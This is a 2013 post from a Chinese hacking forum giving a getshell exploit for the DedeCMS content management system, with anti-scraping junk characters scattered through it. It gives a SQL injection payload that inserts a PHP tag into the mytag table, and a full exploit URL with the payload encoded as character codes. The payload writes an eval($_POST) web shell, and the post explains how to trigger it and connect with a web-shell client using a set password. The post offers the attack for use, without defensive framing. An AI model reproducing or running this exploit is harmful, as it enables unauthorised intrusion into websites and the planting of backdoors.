找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms漏洞getshell EXP最新
返回列表 发新帖
查看: 2808|回复: 0
打印 上一主题 下一主题

dedecms漏洞getshell EXP最新

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-6-10 16:49:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
本帖最后由 土豆 于 2013-6-10 14:41 编辑 + t5 z, @1 b; u8 w+ \$ v1 p

2 G5 R4 t0 p' ]& I- l/ ?
- d. H/ h& M  m4 \作者:鬼哥( J& m3 m3 p) j& S8 I9 m
8 I" M  R: _: I7 ]
看贴不回,没JJ6 F( r- p" U+ m6 ?% W/ T
' \: e6 r- m; t( Q7 ^/ J
漏洞大家都知道是哪个。
' T( b- }( E9 g5 l/ @% R
; ^3 g" I7 J4 b& I' v其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。6 @5 b, r1 R' N' e; j
- {. ^( E9 @' {4 v0 V" l! Z6 @3 `
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。3 \3 n/ l4 P6 G3 D& \0 f7 t5 g* y

' {2 ~4 S! `  I3 X( e% h刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
$ e' b+ H, Y4 t) \# {7 O3 g( W7 P# G+ S. ]2 g! J% h. Z
getshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。- Y. k$ n% F; e' {, P1 o

, l: _* U; y$ R+ w) R1 h但是测试了下。。失败7 d9 I; l) B  B, e7 P" N8 g  T
% g% N0 s1 U8 Y8 G, ]
原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。1 p% B. G% O/ w2 D; B5 c

  L% g* `6 e' `构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`4 J$ H( W/ v4 ?7 k& s- F

0 J6 u$ p4 t6 W2 R) l- ^EXP:2 R  t$ w7 x3 D; E
1 w5 u; I: ^) p2 w& e
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
7 y& z  @4 I; G) h" B% p! ]- Q7 p: j# W4 y1 e* \) E& N
; H( ?, ?& ]" G8 s; Z* v% t
成功增加。: t8 n" Y% J3 w0 H; y+ _5 @( P
+ H7 ~2 C+ P$ r& O5 u
访问http://www.xxx.com/plus/mytag_js.php?aid=9013- q5 @1 O5 m4 z; \  T: N4 [
生成一句话木马.
# ~- d! `7 @* U1 q菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige
$ w, C. v. I8 T: v7 J! K" v" M2 e) K5 u9 h* E
测试OK。
& u6 K4 E  c- R' A' L! Y$ Y
2 h9 U" V; |2 \- I3 I
3 A! m' m* |2 ?" R6 H
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表